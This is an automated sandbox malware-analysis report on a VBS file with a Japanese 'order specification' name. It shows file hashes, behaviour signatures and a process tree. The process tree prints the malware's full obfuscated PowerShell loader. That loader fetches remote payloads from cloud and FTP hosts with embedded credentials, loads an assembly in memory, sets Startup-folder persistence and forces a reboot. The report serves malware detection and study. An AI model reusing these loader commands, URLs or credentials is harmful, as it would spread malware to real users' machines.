Overview

overview

10

Static

static

1

注文仕様書.vbs

windows7-x64

10

注文仕様書.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    24-09-2024 09:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    注文仕様書.vbs

  • Size

    562KB

  • MD5

    5548cba2f4acdafa93152fcec4f27ac8

  • SHA1

    fc3227f824be04c73fa9e864f5bf34676bbcad8c

  • SHA256

    55b6b8489894a7769451a1a45f5662ae2e0f9f1057077643c15699aa43d39eed

  • SHA512

    5fbed2a9a76a798cb057b61a1b895e72da32d93954f368be1b29a89d77e4a8b1e480675b53b95626f04ce937875c716bbd1d6072ebe27e7a2bd3fbf149f3aacf

  • SSDEEP

    1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1:k5oTl

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

  • Drops startup file 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Windows directory 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\注文仕様書.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9ҼмẦDsҼмẦKQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦGUҼмẦdQByҼмẦHQҼмẦJwҼмẦgҼмẦCwҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦgҼмẦCwҼмẦIҼмẦҼмẦnҼмẦGgҼмẦdҼмẦB0ҼмẦHҼмẦҼмẦcwҼмẦ6ҼмẦC8ҼмẦLwBlҼмẦHYҼмẦaQByҼмẦHQҼмẦdQBhҼмẦGwҼмẦcwBlҼмẦHIҼмẦdgBpҼмẦGMҼмẦZQBzҼмẦHIҼмẦZQB2ҼмẦGkҼмẦZQB3ҼмẦHMҼмẦLgBjҼмẦG8ҼмẦbQҼмẦvҼмẦHcҼмẦcҼмẦҼмẦtҼмẦGkҼмẦbgBjҼмẦGwҼмẦdQBkҼмẦGUҼмẦcwҼмẦvҼмẦGMҼмẦcwBzҼмẦC8ҼмẦagBwҼмẦC4ҼмẦdҼмẦB4ҼмẦHQҼмẦJwҼмẦgҼмẦCgҼмẦIҼмẦBdҼмẦF0ҼмẦWwB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwBbҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦGwҼмẦbҼмẦB1ҼмẦG4ҼмẦJҼмẦҼмẦgҼмẦCgҼмẦZQBrҼмẦG8ҼмẦdgBuҼмẦEkҼмẦLgҼмẦpҼмẦCҼмẦҼмẦJwBJҼмẦFYҼмẦRgByҼмẦHҼмẦҼмẦJwҼмẦgҼмẦCgҼмẦZҼмẦBvҼмẦGgҼмẦdҼмẦBlҼмẦE0ҼмẦdҼмẦBlҼмẦEcҼмẦLgҼмẦpҼмẦCcҼмẦMQBzҼмẦHMҼмẦYQBsҼмẦEMҼмẦLgҼмẦzҼмẦHkҼмẦcgBhҼмẦHIҼмẦYgBpҼмẦEwҼмẦcwBzҼмẦGEҼмẦbҼмẦBDҼмẦCcҼмẦKҼмẦBlҼмẦHҼмẦҼмẦeQBUҼмẦHQҼмẦZQBHҼмẦC4ҼмẦKQҼмẦgҼмẦFoҼмẦYwBCҼмẦGMҼмẦYQҼмẦkҼмẦCҼмẦҼмẦKҼмẦBkҼмẦGEҼмẦbwBMҼмẦC4ҼмẦbgBpҼмẦGEҼмẦbQBvҼмẦEQҼмẦdҼмẦBuҼмẦGUҼмẦcgByҼмẦHUҼмẦQwҼмẦ6ҼмẦDoҼмẦXQBuҼмẦGkҼмẦYQBtҼмẦG8ҼмẦRҼмẦBwҼмẦHҼмẦҼмẦQQҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦOwҼмẦpҼмẦCҼмẦҼмẦKQҼмẦgҼмẦCcҼмẦQQҼмẦnҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦCcҼмẦkyE6ҼмẦJMhJwҼмẦgҼмẦCgҼмẦZQBjҼмẦGEҼмẦbҼмẦBwҼмẦGUҼмẦUgҼмẦuҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦDQҼмẦNgBlҼмẦHMҼмẦYQBCҼмẦG0ҼмẦbwByҼмẦEYҼмẦOgҼмẦ6ҼмẦF0ҼмẦdҼмẦByҼмẦGUҼмẦdgBuҼмẦG8ҼмẦQwҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦWgBjҼмẦEIҼмẦYwBhҼмẦCQҼмẦIҼмẦBdҼмẦF0ҼмẦWwBlҼмẦHQҼмẦeQBCҼмẦFsҼмẦOwҼмẦnҼмẦCUҼмẦSQBoҼмẦHEҼмẦUgBYҼмẦCUҼмẦJwҼмẦgҼмẦD0ҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦCҼмẦҼмẦKҼмẦBnҼмẦG4ҼмẦaQByҼмẦHQҼмẦUwBkҼмẦGEҼмẦbwBsҼмẦG4ҼмẦdwBvҼмẦEQҼмẦLgB1ҼмẦHkҼмẦYwBmҼмẦCQҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBTҼмẦHoҼмẦQwBCҼмẦGwҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦKҼмẦBlҼмẦHMҼмẦbwBwҼмẦHMҼмẦaQBkҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQҼмẦgҼмẦCcҼмẦdҼмẦB4ҼмẦHQҼмẦLgҼмẦxҼмẦDҼмẦҼмẦTҼмẦBMҼмẦEQҼмẦLwҼмẦxҼмẦDҼмẦҼмẦLwByҼмẦGUҼмẦdҼмẦBwҼмẦHkҼмẦcgBjҼмẦHҼмẦҼмẦVQҼмẦvҼмẦHIҼмẦYgҼмẦuҼмẦG0ҼмẦbwBjҼмẦC4ҼмẦdҼмẦBhҼмẦHIҼмẦYgB2ҼмẦGsҼмẦYwBzҼмẦGUҼмẦZҼмẦҼмẦuҼмẦHҼмẦҼмẦdҼмẦBmҼмẦEҼмẦҼмẦMQB0ҼмẦGEҼмẦcgBiҼмẦHYҼмẦawBjҼмẦHMҼмẦZQBkҼмẦC8ҼмẦLwҼмẦ6ҼмẦHҼмẦҼмẦdҼмẦBmҼмẦCcҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦEҼмẦҼмẦQҼмẦBwҼмẦEoҼмẦOҼмẦҼмẦ3ҼмẦDUҼмẦMQҼмẦyҼмẦG8ҼмẦcgBwҼмẦHIҼмẦZQBwҼмẦG8ҼмẦbҼмẦBlҼмẦHYҼмẦZQBkҼмẦCcҼмẦLҼмẦҼмẦpҼмẦCkҼмẦOQҼмẦ0ҼмẦCwҼмẦNgҼмẦxҼмẦDEҼмẦLҼмẦҼмẦ3ҼмẦDkҼмẦLҼмẦҼмẦ0ҼмẦDEҼмẦMQҼмẦsҼмẦDgҼмẦOQҼмẦsҼмẦDgҼмẦMQҼмẦxҼмẦCwҼмẦNwҼмẦwҼмẦDEҼмẦLҼмẦҼмẦ5ҼмẦDkҼмẦLҼмẦҼмẦ1ҼмẦDEҼмẦMQҼмẦsҼмẦDEҼмẦMҼмẦҼмẦxҼмẦCwҼмẦMҼмẦҼмẦwҼмẦDEҼмẦKҼмẦBdҼмẦF0ҼмẦWwByҼмẦGEҼмẦaҼмẦBjҼмẦFsҼмẦIҼмẦBuҼмẦGkҼмẦbwBqҼмẦC0ҼмẦKҼмẦҼмẦoҼмẦGwҼмẦYQBpҼмẦHQҼмẦbgBlҼмẦGQҼмẦZQByҼмẦEMҼмẦawByҼмẦG8ҼмẦdwB0ҼмẦGUҼмẦTgҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦIҼмẦB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwҼмẦtҼмẦHcҼмẦZQBuҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHMҼмẦbҼмẦBhҼмẦGkҼмẦdҼмẦBuҼмẦGUҼмẦZҼмẦBlҼмẦHIҼмẦQwҼмẦuҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦOwҼмẦyҼмẦDEҼмẦcwBsҼмẦFQҼмẦOgҼмẦ6ҼмẦF0ҼмẦZQBwҼмẦHkҼмẦVҼмẦBsҼмẦG8ҼмẦYwBvҼмẦHQҼмẦbwByҼмẦFҼмẦҼмẦeQB0ҼмẦGkҼмẦcgB1ҼмẦGMҼмẦZQBTҼмẦC4ҼмẦdҼмẦBlҼмẦE4ҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGwҼмẦbwBjҼмẦG8ҼмẦdҼмẦBvҼмẦHIҼмẦUҼмẦB5ҼмẦHQҼмẦaQByҼмẦHUҼмẦYwBlҼмẦFMҼмẦOgҼмẦ6ҼмẦF0ҼмẦcgBlҼмẦGcҼмẦYQBuҼмẦGEҼмẦTQB0ҼмẦG4ҼмẦaQBvҼмẦFҼмẦҼмẦZQBjҼмẦGkҼмẦdgByҼмẦGUҼмẦUwҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦ7ҼмẦH0ҼмẦZQB1ҼмẦHIҼмẦdҼмẦҼмẦkҼмẦHsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦawBjҼмẦGEҼмẦYgBsҼмẦGwҼмẦYQBDҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBkҼмẦGkҼмẦbҼмẦBhҼмẦFYҼмẦZQB0ҼмẦGEҼмẦYwBpҼмẦGYҼмẦaQB0ҼмẦHIҼмẦZQBDҼмẦHIҼмẦZQB2ҼмẦHIҼмẦZQBTҼмẦDoҼмẦOgBdҼмẦHIҼмẦZQBnҼмẦGEҼмẦbgBhҼмẦE0ҼмẦdҼмẦBuҼмẦGkҼмẦbwBQҼмẦGUҼмẦYwBpҼмẦHYҼмẦcgBlҼмẦFMҼмẦLgB0ҼмẦGUҼмẦTgҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦgҼмẦGYҼмẦLwҼмẦgҼмẦDҼмẦҼмẦIҼмẦB0ҼмẦC8ҼмẦIҼмẦByҼмẦC8ҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦG4ҼмẦdwBvҼмẦGQҼмẦdҼмẦB1ҼмẦGgҼмẦcwҼмẦgҼмẦDsҼмẦJwҼмẦwҼмẦDgҼмẦMQҼмẦgҼмẦHҼмẦҼмẦZQBlҼмẦGwҼмẦcwҼмẦnҼмẦCҼмẦҼмẦZҼмẦBuҼмẦGEҼмẦbQBtҼмẦG8ҼмẦYwҼмẦtҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBsҼмẦGwҼмẦZQBoҼмẦHMҼмẦcgBlҼмẦHcҼмẦbwBwҼмẦDsҼмẦIҼмẦBlҼмẦGMҼмẦcgBvҼмẦGYҼмẦLQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦHҼмẦҼмẦdQB0ҼмẦHIҼмẦYQB0ҼмẦFMҼмẦXҼмẦBzҼмẦG0ҼмẦYQByҼмẦGcҼмẦbwByҼмẦFҼмẦҼмẦXҼмẦB1ҼмẦG4ҼмẦZQBNҼмẦCҼмẦҼмẦdҼмẦByҼмẦGEҼмẦdҼмẦBTҼмẦFwҼмẦcwB3ҼмẦG8ҼмẦZҼмẦBuҼмẦGkҼмẦVwBcҼмẦHQҼмẦZgBvҼмẦHMҼмẦbwByҼмẦGMҼмẦaQBNҼмẦFwҼмẦZwBuҼмẦGkҼмẦbQBhҼмẦG8ҼмẦUgBcҼмẦGEҼмẦdҼмẦBhҼмẦEQҼмẦcҼмẦBwҼмẦEEҼмẦXҼмẦҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦCҼмẦҼмẦKҼмẦҼмẦgҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBuҼмẦGkҼмẦdҼмẦBzҼмẦGUҼмẦRҼмẦҼмẦtҼмẦCҼмẦҼмẦJwҼмẦlҼмẦEkҼмẦaҼмẦBxҼмẦFIҼмẦWҼмẦҼмẦlҼмẦCcҼмẦIҼмẦBtҼмẦGUҼмẦdҼмẦBJҼмẦC0ҼмẦeQBwҼмẦG8ҼмẦQwҼмẦgҼмẦDsҼмẦIҼмẦB0ҼмẦHIҼмẦYQB0ҼмẦHMҼмẦZQByҼмẦG8ҼмẦbgҼмẦvҼмẦCҼмẦҼмẦdҼмẦBlҼмẦGkҼмẦdQBxҼмẦC8ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGEҼмẦcwB1ҼмẦHcҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGwҼмẦbҼмẦBlҼмẦGgҼмẦcwByҼмẦGUҼмẦdwBvҼмẦHҼмẦҼмẦIҼмẦҼмẦ7ҼмẦCkҼмẦJwB1ҼмẦHMҼмẦbQҼмẦuҼмẦG4ҼмẦaQB3ҼмẦHҼмẦҼмẦVQBcҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦTgBKҼмẦFQҼмẦeҼмẦBEҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦOwҼмẦpҼмẦCҼмẦҼмẦZQBtҼмẦGEҼмẦTgByҼмẦGUҼмẦcwBVҼмẦDoҼмẦOgBdҼмẦHQҼмẦbgBlҼмẦG0ҼмẦbgBvҼмẦHIҼмẦaQB2ҼмẦG4ҼмẦRQBbҼмẦCҼмẦҼмẦKwҼмẦgҼмẦCcҼмẦXҼмẦBzҼмẦHIҼмẦZQBzҼмẦFUҼмẦXҼмẦҼмẦ6ҼмẦEMҼмẦJwҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦHUҼмẦcwBtҼмẦC4ҼмẦbgBpҼмẦHcҼмẦcҼмẦBVҼмẦFwҼмẦJwҼмẦgҼмẦCsҼмẦIҼмẦBOҼмẦEoҼмẦVҼмẦB4ҼмẦEQҼмẦJҼмẦҼмẦgҼмẦCwҼмẦQgBLҼмẦEwҼмẦUgBVҼмẦCQҼмẦKҼмẦBlҼмẦGwҼмẦaQBGҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHMҼмẦdҼмẦBtҼмẦG8ҼмẦbwҼмẦkҼмẦDsҼмẦOҼмẦBGҼмẦFQҼмẦVQҼмẦ6ҼмẦDoҼмẦXQBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgB0ҼмẦHgҼмẦZQBUҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦdҼмẦBuҼмẦGUҼмẦaQBsҼмẦEMҼмẦYgBlҼмẦFcҼмẦLgB0ҼмẦGUҼмẦTgҼмẦgҼмẦHQҼмẦYwBlҼмẦGoҼмẦYgBPҼмẦC0ҼмẦdwBlҼмẦE4ҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦH0ҼмẦOwҼмẦgҼмẦCkҼмẦJwB0ҼмẦE8ҼмẦTҼмẦBjҼмẦF8ҼмẦSwBhҼмẦDMҼмẦWgBmҼмẦG8ҼмẦWҼмẦҼмẦyҼмẦEoҼмẦSgByҼмẦFYҼмẦaҼмẦBtҼмẦFYҼмẦOQBjҼмẦG0ҼмẦOQBYҼмẦHMҼмẦdQBYҼмẦG0ҼмẦagҼмẦxҼмẦGcҼмẦMQҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦG8ҼмẦeҼмẦBLҼмẦFUҼмẦZwҼмẦkҼмẦCgҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦ7ҼмẦCҼмẦҼмẦKQҼмẦnҼмẦDIҼмẦNҼмẦB1ҼмẦFgҼмẦSgBUҼмẦHEҼмẦYQBtҼмẦGcҼмẦeQBNҼмẦHQҼмẦRgB6ҼмẦGEҼмẦawBQҼмẦFIҼмẦMQBxҼмẦF8ҼмẦSQB2ҼмẦEcҼмẦaQBYҼмẦE4ҼмẦZҼмẦBxҼмẦGEҼмẦTgҼмẦxҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAGQAdgBvAGYAWAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGQAdgBvAGYAWAAkACAAOwA=';$kahlN = $qKKzc.replace('ҼмẦ' , 'A') ;$DLOWx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $DLOWx = $DLOWx[-1..-$DLOWx.Length] -join '';$DLOWx = $DLOWx.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\注文仕様書.vbs');powershell $DLOWx
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2644
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Xfovd = $host.Version.Major.Equals(2) ;if ( $Xfovd ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$oomts = (New-Object Net.WebClient);$oomts.Encoding = [System.Text.Encoding]::UTF8;$oomts.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\注文仕様書.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$fcyu = (New-Object Net.WebClient);$fcyu.Encoding = [System.Text.Encoding]::UTF8;$fcyu.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $fcyu.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$fcyu.dispose();$fcyu = (New-Object Net.WebClient);$fcyu.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $fcyu.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\注文仕様書.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.pj/ssc/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
        3⤵
        • Drops startup file
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2808
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe RiWcG /quiet /norestart
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\system32\wusa.exe
            "C:\Windows\system32\wusa.exe" RiWcG /quiet /norestart
            5⤵
            • Drops file in Windows directory
            PID:2500
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2580

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    366853ab38a4e3611480c386ed2ebd8b

    SHA1

    ae69550dd91d93b8061b17a23cb476f4f607f56a

    SHA256

    ed67cb8ef5149e9c0fed1f7cf8d424d64778d7235f6e450ec7445d8a6c642752

    SHA512

    e21e2b0288466a6bab979e1c189a781cc6caaca598de3674a32ab8fdbf2356422d7b1321c25f5b1c04ab705b6018fa65159badcd51b6763de54483a00fd48374

    Download Submit

  • memory/2644-4-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2644-5-0x000000001B7B0000-0x000000001BA92000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2644-6-0x00000000027F0000-0x00000000027F8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2644-12-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2644-13-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2644-26-0x000007FEF50C0000-0x000007FEF5A5D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2644-27-0x000007FEF537E000-0x000007FEF537F000-memory.dmp

    Filesize

    4KB

    Download